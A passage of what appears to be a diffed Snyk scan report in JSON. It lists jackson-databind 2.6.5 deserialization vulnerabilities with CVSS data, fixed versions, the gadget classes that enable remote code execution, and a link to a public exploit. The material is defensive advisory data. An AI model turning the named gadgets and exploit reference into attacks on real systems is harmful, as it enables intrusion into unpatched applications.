"https://github.com/FasterXML/jackson-databind/issues/2410", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.892322Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n", + "epssDetails": { + "percentile": "0.74104", + "probability": "0.00410", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14540" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h822-r4r5-v8jg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:10.401907Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:27:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + 
"artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:27:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.008832Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2420", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:32.899468Z" + } + 
], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T14:43:42.115110Z", + "functions_new": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + 
"functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-16T14:37:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T14:37:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:32.899468Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": 
"GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:50.462784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. 
An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16942" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx7p-6679-8g3q" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:02:18.178548Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": 
"CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.988000Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": 
"2024-03-11T09:52:13.709990Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.814203Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16943" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fmmc-742q-jg75" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:03:39.391997Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + 
"severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.024581Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2460", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:04.701685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
